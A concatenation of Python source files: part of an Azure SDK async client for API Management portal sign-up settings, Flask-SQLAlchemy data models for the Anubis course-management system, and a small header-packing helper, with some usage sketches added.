url = self.get_entity_tag.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
if cls:
return cls(pipeline_response, None, response_headers)
return 200 <= response.status_code <= 299
get_entity_tag.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
async def get(
self,
resource_group_name: str,
service_name: str,
**kwargs
) -> "models.PortalSignupSettings":
"""Get Sign Up Settings for the Portal.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PortalSignupSettings, or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.PortalSignupSettings
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PortalSignupSettings"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('PortalSignupSettings', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
async def update(
self,
resource_group_name: str,
service_name: str,
if_match: str,
enabled: Optional[bool] = None,
terms_of_service: Optional["models.TermsOfServiceProperties"] = None,
**kwargs
) -> None:
"""Update Sign-Up settings.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:param if_match: ETag of the Entity. ETag should match the current entity state from the header
response of the GET request or it should be * for unconditional update.
:type if_match: str
:param enabled: Allow users to sign up on a developer portal.
:type enabled: bool
:param terms_of_service: Terms of service contract properties.
:type terms_of_service: ~azure.mgmt.apimanagement.models.TermsOfServiceProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.PortalSignupSettings(enabled=enabled, terms_of_service=terms_of_service)
api_version = "2020-06-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'PortalSignupSettings')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
service_name: str,
if_match: Optional[str] = None,
enabled: Optional[bool] = None,
terms_of_service: Optional["models.TermsOfServiceProperties"] = None,
**kwargs
) -> "models.PortalSignupSettings":
"""Create or Update Sign-Up settings.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:param if_match: ETag of the Entity. Not required when creating an entity, but required when
updating an entity.
:type if_match: str
:param enabled: Allow users to sign up on a developer portal.
:type enabled: bool
:param terms_of_service: Terms of service contract properties.
:type terms_of_service: ~azure.mgmt.apimanagement.models.TermsOfServiceProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PortalSignupSettings, or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.PortalSignupSettings
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PortalSignupSettings"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.PortalSignupSettings(enabled=enabled, terms_of_service=terms_of_service)
api_version = "2020-06-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'PortalSignupSettings')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PortalSignupSettings', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
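# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the generated client). It assumes the
# async ``ApiManagementClient`` exposes this operation group as a
# ``sign_up_settings`` attribute (inferred from the class name above) and that
# the caller supplies a valid ``credential`` and ``subscription_id``; the
# resource group and service names below are placeholders.
async def _example_toggle_sign_up(credential, subscription_id):
    from azure.mgmt.apimanagement.aio import ApiManagementClient
    async with ApiManagementClient(credential, subscription_id) as client:
        ops = client.sign_up_settings  # assumed attribute name
        settings = await ops.get("my-resource-group", "my-apim-service")
        # '*' performs an unconditional update; a real ETag could instead be
        # obtained via ``get_entity_tag`` or the GET response headers.
        await ops.update(
            resource_group_name="my-resource-group",
            service_name="my-apim-service",
            if_match="*",
            enabled=not settings.enabled,
        )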
|
py | 1a331b88cd3c2f1269888652fd586af5c926cf8f | import base64
import copy
import os
from datetime import datetime, timedelta
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.orm import deferred
from sqlalchemy_json import MutableJson
from anubis.utils.data import rand
db = SQLAlchemy()
THEIA_DEFAULT_OPTIONS = {
"autosave": True,
"persistent_storage": False,
"network_policy": "os-student",
"resources": {
"requests": {"cpu": "300m", "memory": "300Mi"},
"limits": {"cpu": "2", "memory": "500Mi"},
},
}
def default_id(max_len=None) -> db.Column:
return db.Column(
db.String(128), primary_key=True, default=lambda: rand(max_len or 32)
)
class Config(db.Model):
__tablename__ = "anubis_config"
# Fields
key = db.Column(db.String(128), primary_key=True)
value = db.Column(db.String(2048))
@property
def data(self):
return {
"key": self.key,
"value": self.value,
}
class User(db.Model):
__tablename__ = "user"
# id
id = default_id()
# Fields
netid = db.Column(db.String(128), primary_key=True, unique=True, index=True)
github_username = db.Column(db.TEXT, index=True)
name = db.Column(db.TEXT)
is_superuser = db.Column(db.Boolean, nullable=False, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="owner"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="owner"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="owner")
assignment_repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="owner"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="owner"
)
submissions = db.relationship("Submission", cascade="all,delete", backref="owner")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="owner"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="user"
)
@property
def data(self):
from anubis.lms.courses import get_user_permissions
return {
"id": self.id,
"netid": self.netid,
"github_username": self.github_username,
"name": self.name,
**get_user_permissions(self),
}
def __repr__(self):
return self.__str__()
def __str__(self):
return f"<User {self.netid} {self.github_username}>"
class Course(db.Model):
__tablename__ = "course"
# id
id = default_id()
# Fields
name = db.Column(db.TEXT, nullable=False)
course_code = db.Column(db.TEXT, nullable=False)
semester = db.Column(db.TEXT, nullable=True)
section = db.Column(db.TEXT, nullable=True)
professor_display_name = db.Column(db.TEXT)
autograde_tests_repo = db.Column(
db.TEXT,
nullable=False,
default="https://github.com/os3224/anubis-assignment-tests",
)
github_repo_required = db.Column(db.Boolean, default=True)
theia_default_image = db.Column(
db.TEXT, nullable=False, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_default_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
github_org = db.Column(db.TEXT, default="os3224")
join_code = db.Column(db.String(256), unique=True)
display_visuals = db.Column(db.Boolean, default=True)
assignments = db.relationship("Assignment", cascade="all,delete", backref="course")
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="course"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="course"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="course")
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="course"
)
static_files = db.relationship("StaticFile", cascade="all,delete", backref="course")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="course"
)
@property
def total_assignments(self):
return self.open_assignments
@property
def open_assignments(self):
now = datetime.now()
return Assignment.query.filter(
Assignment.course_id == self.id,
Assignment.release_date <= now,
Assignment.hidden == False,
).count()
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"course_code": self.course_code,
"section": self.section,
"professor_display_name": self.professor_display_name,
"total_assignments": self.total_assignments,
"open_assignment": self.open_assignments,
"join_code": self.id[:6],
}
class TAForCourse(db.Model):
__tablename__ = "ta_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class ProfessorForCourse(db.Model):
__tablename__ = "professor_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class InCourse(db.Model):
__tablename__ = "in_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
class Assignment(db.Model):
__tablename__ = "assignment"
# id
id = default_id()
# Foreign Keys
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), index=True)
# Fields
name = db.Column(db.TEXT, nullable=False, index=True)
hidden = db.Column(db.Boolean, default=False)
description = db.Column(db.TEXT, nullable=True)
unique_code = db.Column(
db.String(8),
unique=True,
default=lambda: base64.b16encode(os.urandom(4)).decode().lower(),
)
accept_late = db.Column(db.Boolean, default=True)
hide_due_date = db.Column(db.Boolean, default=False)
questions_assigned = db.Column(db.Boolean, default=False)
# Autograde
pipeline_image = db.Column(db.TEXT, nullable=True, index=True)
autograde_enabled = db.Column(db.Boolean, default=True)
# IDE
ide_enabled = db.Column(db.Boolean, default=True)
theia_image = db.Column(
db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
# Github
github_template = db.Column(db.TEXT, nullable=True, default="")
github_repo_required = db.Column(db.Boolean, default=False)
# Dates
release_date = db.Column(db.DateTime, nullable=False)
due_date = db.Column(db.DateTime, nullable=False)
grace_date = db.Column(db.DateTime, nullable=True)
assignment_questions = db.relationship(
"AssignmentQuestion", cascade="all,delete", backref="assignment"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="assignment"
)
submissions = db.relationship(
"Submission", cascade="all,delete", backref="assignment"
)
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="assignment"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="assignment"
)
tests = db.relationship(
"AssignmentTest", cascade="all,delete", backref="assignment"
)
repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="assignment"
)
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"due_date": str(self.due_date),
"past_due": self.due_date < datetime.now(),
"hidden": self.hidden,
"accept_late": self.accept_late,
"autograde_enabled": self.autograde_enabled,
"hide_due_date": self.hide_due_date,
"course": self.course.data,
"description": self.description,
"visible_to_students": not self.hidden
and (datetime.now() > self.release_date),
"ide_active": self.due_date + timedelta(days=3 * 7) > datetime.now(),
"tests": [t.data for t in self.tests if t.hidden is False],
# IDE
"ide_enabled": self.ide_enabled,
"autosave": self.theia_options.get("autosave", True),
"persistent_storage": self.theia_options.get("persistent_storage", False),
# Github
"github_repo_required": self.github_repo_required,
}
@property
def full_data(self):
data = self.data
data["tests"] = [t.data for t in self.tests]
return data
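# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the minimum fields
# needed to create an ``Assignment`` (``name``, ``release_date`` and
# ``due_date`` are non-nullable). The course id, name and dates are made up,
# and an active Flask application context is assumed.
def _example_create_assignment(course_id):
    assignment = Assignment(
        course_id=course_id,
        name="hw1",
        release_date=datetime(2021, 9, 1),
        due_date=datetime(2021, 9, 15),
    )
    db.session.add(assignment)
    db.session.commit()
    return assignment.data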
class AssignmentRepo(db.Model):
__tablename__ = "assignment_repo"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=False
)
# Fields
github_username = db.Column(db.TEXT, nullable=False)
repo_url = db.Column(db.String(512), nullable=False)
# State booleans
repo_created = db.Column(db.Boolean, default=False)
collaborator_configured = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"github_username": self.github_username,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name,
"ready": self.repo_created and self.collaborator_configured,
"course_code": self.assignment.course.course_code,
"repo_url": self.repo_url,
}
class AssignmentTest(db.Model):
__tablename__ = "assignment_test"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id))
# Fields
name = db.Column(db.TEXT, index=True)
hidden = db.Column(db.Boolean, default=False)
@property
def data(self):
return {"id": self.id, "name": self.name, "hidden": self.hidden}
class AssignmentQuestion(db.Model):
__tablename__ = "assignment_question"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id), index=True)
# Fields
question = db.Column(db.Text, nullable=False)
solution = db.Column(db.Text, nullable=True)
pool = db.Column(db.Integer, index=True, nullable=False)
code_question = db.Column(db.Boolean, default=False)
code_language = db.Column(db.TEXT, nullable=True, default="")
placeholder = db.Column(db.Text, nullable=True, default="")
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
shape = {"question": str, "solution": str, "pool": int}
@property
def full_data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"solution": self.solution,
"pool": self.pool,
}
@property
def data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"pool": self.pool,
}
class AssignedStudentQuestion(db.Model):
__tablename__ = "assigned_student_question"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id))
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
question_id = db.Column(
db.String(128), db.ForeignKey(AssignmentQuestion.id), index=True, nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Relationships
question = db.relationship(AssignmentQuestion)
responses = db.relationship(
"AssignedQuestionResponse", cascade="all,delete", backref="question"
)
@property
def data(self):
"""
        Returns a simple dictionary representation of the object.
:return:
"""
response: AssignedQuestionResponse = (
AssignedQuestionResponse.query.filter(
AssignedQuestionResponse.assigned_question_id == self.id,
)
.order_by(AssignedQuestionResponse.created.desc())
.first()
)
response_data = {
"submitted": None,
"late": True,
"text": self.question.placeholder,
}
if response is not None:
response_data = response.data
return {
"id": self.id,
"response": response_data,
"question": self.question.data,
}
@property
def full_data(self):
data = self.data
data["question"] = self.question.full_data
return data
class AssignedQuestionResponse(db.Model):
__tablename__ = "assigned_student_response"
# id
id = default_id()
# Foreign Keys
assigned_question_id = db.Column(
db.String(128),
db.ForeignKey(AssignedStudentQuestion.id),
index=True,
nullable=False,
)
# Fields
response = db.Column(db.TEXT, default="", nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.assignments import get_assignment_due_date
return {
"submitted": str(self.created),
"late": get_assignment_due_date(
self.question.owner.id, self.question.assignment.id
)
< self.created,
"text": self.response,
}
class Submission(db.Model):
__tablename__ = "submission"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(
db.String(128), db.ForeignKey(User.id), index=True, nullable=True
)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
assignment_repo_id = db.Column(
db.String(128), db.ForeignKey(AssignmentRepo.id), nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
commit = db.Column(db.String(128), unique=True, index=True, nullable=False)
processed = db.Column(db.Boolean, default=False)
state = db.Column(db.TEXT, default="")
errors = db.Column(MutableJson, default=None, nullable=True)
token = db.Column(
db.String(64), default=lambda: base64.b16encode(os.urandom(32)).decode()
)
accepted = db.Column(db.Boolean, default=True)
# Relationships
build = db.relationship(
"SubmissionBuild",
cascade="all,delete",
uselist=False,
backref="submission",
lazy=False,
)
test_results = db.relationship(
"SubmissionTestResult", cascade="all,delete", backref="submission", lazy=False
)
repo = db.relationship(AssignmentRepo, backref="submissions")
@property
def visible_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
AssignmentTest.hidden == False,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def all_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def data(self):
return {
"id": self.id,
"assignment_name": self.assignment.name,
"assignment_due": str(self.assignment.due_date),
"course_code": self.assignment.course.course_code,
"commit": self.commit,
"processed": self.processed,
"state": self.state,
"created": str(self.created),
"last_updated": str(self.last_updated),
"error": self.errors is not None,
}
@property
def full_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.visible_tests
data["build"] = self.build.data if self.build is not None else None
return data
@property
def admin_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.all_tests
data["build"] = self.build.data if self.build is not None else None
return data
class SubmissionTestResult(db.Model):
__tablename__ = "submission_test_result"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(
db.String(128), db.ForeignKey(Submission.id), primary_key=True
)
assignment_test_id = db.Column(
db.String(128), db.ForeignKey(AssignmentTest.id), primary_key=True
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
stdout = deferred(db.Column(db.Text))
message = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean)
# Relationships
assignment_test = db.relationship(AssignmentTest)
@property
def data(self):
return {
"id": self.id,
"test_name": self.assignment_test.name,
"passed": self.passed,
"message": self.message,
"stdout": self.stdout,
"created": str(self.created),
"last_updated": str(self.last_updated),
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
    def __str__(self):
        # Use attributes that actually exist on this model: the test name
        # lives on the related ``assignment_test`` and failure details are
        # stored in ``message`` (there is no ``testname`` or ``errors`` column).
        return "test_name: {}\nmessage: {}\npassed: {}\n".format(
            self.assignment_test.name,
            self.message,
            self.passed,
        )
class SubmissionBuild(db.Model):
__tablename__ = "submission_build"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(db.String(128), db.ForeignKey(Submission.id), index=True)
# Fields
stdout = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean, default=None)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"stdout": self.stdout,
"passed": self.passed,
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
class TheiaSession(db.Model):
__tablename__ = "theia_session"
# id
id = default_id(32)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Foreign keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=False)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=True
)
repo_url = db.Column(db.String(128), nullable=True)
# Fields
active = db.Column(db.Boolean, default=True)
state = db.Column(db.TEXT)
cluster_address = db.Column(db.TEXT, nullable=True, default=None)
image = db.Column(db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6")
resources = db.Column(MutableJson, default=lambda: {})
network_policy = db.Column(db.String(128), default="os-student")
network_locked = db.Column(db.Boolean, default=True)
privileged = db.Column(db.Boolean, default=False)
autosave = db.Column(db.Boolean, default=True)
credentials = db.Column(db.Boolean, default=False)
persistent_storage = db.Column(db.Boolean, default=False)
k8s_requested = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
ended = db.Column(db.DateTime, nullable=True, default=None)
last_proxy = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.theia import theia_redirect_url
return {
"id": self.id,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name
if self.assignment_id is not None
else None,
"course_code": self.assignment.course.course_code
if self.assignment_id is not None
else None,
"netid": self.owner.netid,
"repo_url": self.repo_url,
"redirect_url": theia_redirect_url(self.id, self.owner.netid),
"active": self.active,
"state": self.state,
"created": str(self.created),
"ended": str(self.ended),
"last_proxy": str(self.last_proxy),
"last_updated": str(self.last_updated),
"autosave": self.autosave,
"persistent_storage": self.persistent_storage,
}
@property
def settings(self):
return {
"image": self.image,
"repo_url": self.repo_url,
"autosave": self.autosave,
"privileged": self.privileged,
"credentials": self.credentials,
"network_locked": self.network_locked,
"persistent_storage": self.persistent_storage,
}
class StaticFile(db.Model):
__tablename__ = "static_file"
id = default_id()
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Fields
filename = db.Column(db.TEXT)
path = db.Column(db.TEXT)
content_type = db.Column(db.TEXT)
blob = deferred(db.Column(db.LargeBinary(length=(2 ** 32) - 1)))
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="static_file"
)
@property
def data(self):
return {
"id": self.id,
"content_type": self.content_type,
"filename": self.filename,
"path": self.path,
"hidden": self.hidden,
"uploaded": str(self.created),
}
class LateException(db.Model):
__tablename__ = "late_exception"
user_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), primary_key=True
)
# New Due Date
due_date = db.Column(db.DateTime, nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"user_id": self.user_id,
"user_name": self.user.name,
"user_netid": self.user.netid,
"assignment_id": self.assignment_id,
"due_date": str(self.due_date),
}
class LectureNotes(db.Model):
__tablename__ = "lecture_notes"
id = default_id()
# Foreign keys
static_file_id = db.Column(
db.String(128), db.ForeignKey(StaticFile.id), nullable=False, index=True
)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Meta fields
post_time = db.Column(db.DateTime, nullable=True, default=datetime.now)
title = db.Column(db.TEXT, default="")
description = db.Column(db.TEXT, default="")
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"static_file": self.static_file.data,
"course": self.course.course_code,
"title": self.title,
"description": self.description,
"hidden": self.hidden,
"post_time": str(self.post_time),
"created": str(self.created),
"last_updated": str(self.last_updated),
}
|
py | 1a331bc6938717077623feaa9eadbccb373f5509 | def get_header(header_class, *args, **kwargs):
"""Construct and packs a given header"""
hdr = header_class()
hdr.setVals(*args, **kwargs)
return hdr.pack()
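# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): ``get_header`` only
# requires that ``header_class()`` instances provide ``setVals(*args,
# **kwargs)`` and ``pack()``. ``_DummyHeader`` below is hypothetical and
# exists purely to show that contract.
class _DummyHeader:
    def setVals(self, value=0):
        self.value = value
    def pack(self):
        return self.value.to_bytes(4, "little")
def _example_get_header():
    return get_header(_DummyHeader, value=7)  # b'\x07\x00\x00\x00'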
|
